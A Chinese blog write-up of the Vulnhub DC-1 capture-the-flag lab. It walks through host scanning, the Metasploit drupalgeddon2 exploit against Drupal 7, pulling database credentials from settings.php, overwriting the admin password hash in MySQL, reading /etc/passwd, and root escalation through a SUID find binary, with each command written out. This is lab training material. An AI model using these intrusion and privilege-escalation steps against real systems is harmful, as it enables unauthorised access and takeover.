首页 > 其他分享 >【Vulnhub靶场】DC-1

【Vulnhub靶场】DC-1

时间:2024-10-23 16:55:11浏览次数:8  
标签:hash 密码 DC 192.168 提权 信息 Vulnhub 靶场 find

DC-1靶场下载链接:https://download.vulnhub.com/dc/DC-1.zip

目标

本机IP:192.168.118.128

靶机IP:192.168.118.0/24

信息收集

通过nmap扫存活主机,得到目标ip,扫出其端口信息及服务

nmap -sP 192.168.118.0/24
 
nmap -p- 192.168.118.138
 
nmap -sV -A 192.168.118.138

这里得到其发放了22端口以及80端口

首先访问一下他的web服务:http://192.168.118.138

这里发现一个登录框,首先想到的肯定得是SQL注入了呗,简单尝试以后,行不通

然后此web页面也再没有其他信息

接下来简单收集一下其web指纹,这里使用 whatweb

 这里可以看到其CMS框架是 Drupal 7 版本

MSF漏洞利用

 先直接使用MSF探查一下漏洞

这里发现有众多漏洞,在选择漏洞是首先考虑版本最相近的,不然就一个一个尝试吧,这里我最后选择“1”漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

show options

set rhosts 192.168.118.138

run

这里发现payload已经设置好,可以得到shell,设置好相关漏洞,直接运行

 浅浅shell一下,然后使用Python方法实现交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

flag1

ls一下,看到flag1.txt ,快快打开查看内容

得到 flag1,重要信息应该就是这个CMS的配置文件,接下来我们就得找这个配置文件了

发现是settings.php,在sites/default/files中,在刚在的文件中,记得是有sites这个文件的,直接进去查看此配置文件

flag2

发现里面有flag2,它好像作用也不是很大,但在下面有了详细的数据库信息,还是个mysql,账号密码就这样诱惑着我,那就连接呗

mysql -u dbuser -p R0ck3t

然后就是在数据库中找一找我们想要的信息了 

这里就是一步步找出敏感信息,我就直接给出结果了

show databases;
use drupaldb;
show tables;
select * from users\G;

这里找到了两个用户的信息,看着复杂的密码,尝试了解密,没有任何效果

接下来我们就有两个思路吧,修改密码或者添加新用户

百度参考drupal数据库存放用户密码的加密脚本文件,直接就找到了:/var/www/scripts/password-hash.sh

那应该这个密码就是hash加密了吧,那接下来就修改密码吧

首先我们生成出123456的hash

php scripts/password-hash.sh 123456

我们重新进入数据库,将admin的密码替换为这个加密后的hash

update drupaldb.users set pass="$S$DBdjFBevhOwTeP.UcmRJMfef2lfNMPYS3ykCOaG2UKTkE2gCEAiL" where name='admin';

重新查看用户信息,密码修改成功

接下来我们重新登录刚开始web页面,使用刚修改好的账号密码登录( admin :123456)

OK,登录进去了,最终在里面成功找到 flag3

flag3 

里面说的大概是让我去找passwd和shadow之类的

passwd里面存放的是一般是用户信息一些的,进去查看一下

cat /etc/passwd

 发现里面出现了flag4,后面给出了一个路径,尝试进去查看一下,最终得到了flag4

flag4

falg4里面的信息大概意思是说要得到 root 权限,才能得到 flag

SUID提权

那下一步就是提权了,结合前面找到的信息,应该是SUID提权

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -print 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

 以上三条命令都可以查看到具有SUID权限的文件

find 提权

提权过程:创建一个名为aaa文件夹,尝试在 aaa 目录下执行 /bin/bash 命令  

find 命令结合 -exec 参数来执行不同的命令

-exec:对匹配的文件执行该参数所给出的shell命令

touch aaa

find aaa -exec "/bin/sh" \;

 提权成功

thefinalflag 

cd到root目录下,最终得到 thefinalflag

标签:hash,密码,DC,192.168,提权,信息,Vulnhub,靶场,find
From: https://blog.csdn.net/weixin_73442302/article/details/143181396

相关文章

  • XPM_CDC_PULSE
    免责声明:本文所提供的信息和内容仅供参考。作者对本文内容的准确性、完整性、及时性或适用性不作任何明示或暗示的保证。在任何情况下,作者不对因使用本文内容而导致的任何直接或间接损失承担责任,包括但不限于数据丢失、业务中断或其他经济损失。读者在使用本文信息时,应自行验......
  • YOLO11改进:卷积变体系列篇 | DCNv3可形变卷积基于DCNv2优化 | CVPR2023
     ......
  • Vulnhub打靶-ICA
    基本信息靶机下载:https://download.vulnhub.com/ica/ica1.zip攻击机器:192.168.20.128(Windows操作系统)&192.168.20.138(kali)提示信息:根据我们的情报网络提供的信息,ICA正在进行一个秘密项目。我们需要找出这个项目是什么。获得访问信息后,请将其发送给我们。我们将设置一......
  • 【VMware VCF】使用 PowerShell 脚本管理 SDDC Manager 中的软件包。
    SDDCManager中有两种类型的软件包,分别是“升级/修补包(PATCH)”和“安装包(INSTALL)”。“升级/修补包”用于执行VCF环境中组件的升级/修补,这个已经在前面的文章中使用过了;而另外一种“安装包”,这种包用于在VCF环境中部署其他集成解决方案,比如VMwareAriaSuiteLifecycleMana......
  • 理解ADC:“过采样”算不算是神操作?附带介绍Noise Spectral Density
    前言上回说到“理想ADC”中只存在量化噪声,并且介绍了SNR=6.02N+1.76dB的计算公式。那么,是否意味着“底噪”(NoiseFloor)就是这个SNR的负数呢?先来看一张图,原始出自于ADI的文章(见参考资料[1]),我做了些标注:图1ADCSNR与Noisefloor图中假设了一个12-bit的ADC,......
  • DC-8靶场渗透
    靶机:DC-8DC:8~VulnHubhttps://www.vulnhub.com/entry/dc-8,367/攻击机:kaillinux20241,将两台虚拟机网络连接都改为NAT模式,并查看DC-8的MAC地址2,进行主机扫描,通过MAC地址发现靶机的IP地址得到本机IP地址:192.168.23.169;靶机IP地址:192.168.23.1753,对靶机进行更精......
  • 玄机蓝队靶场_应急响应_61:windows实战-emlog
    win+rmstsc连接不能联网,不然直接河马查杀一下把www文件夹压缩下载下来用河马在线网站也是直接得到冰蝎木马文件:/WWW/content/plugins/tips/shell.php在www文件夹直接搜索shell文件(盲猜)找到连接密码flag{rebeyond}直接找apache目录看日志phpstudy_pro/Extensions/Apache......
  • 玄机蓝队靶场_应急响应_25:webshell查杀
    参考:https://blog.csdn.net/administratorlws/article/details/139521078Xterm连接之后看到/var/www有网站,直接下载下来用工具扫扫木马。客户端太拉了,下次直接用河马在线网站扫。找shell.php.提交flag{1}发现不对,河马客户端没给它扫出来。然后乱翻翻到了flag{027ccd04-506......
  • SSM高校教学设备管理系统j4dcd+程序+源码+数据库+调试部署+开发环境
    本系统(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。系统程序文件列表项目功能:用户,设备信息,设备申请,设备归还,设备采购,设备维修,设备报废开题报告内容一、研究背景与意义随着高校教学设备的不断增加,传统的手工管理方式已无法......
  • 《小缇娜的奇幻之地》丢失d3dcompiler_47.dll游戏启动失败?《小缇娜的奇幻之地》d3dcom
    当你满怀期待地准备启动《小缇娜的奇幻之地》这款游戏时,却遇到了一个令人沮丧的错误提示:“d3dcompiler_47.dll丢失,游戏启动失败”。别担心,这个问题并非无解。下面,我们将为你介绍五种修复d3dcompiler_47.dll文件丢失的方法,帮助你重新踏上奇幻之旅。方法一:使用系统文件检查器(SF......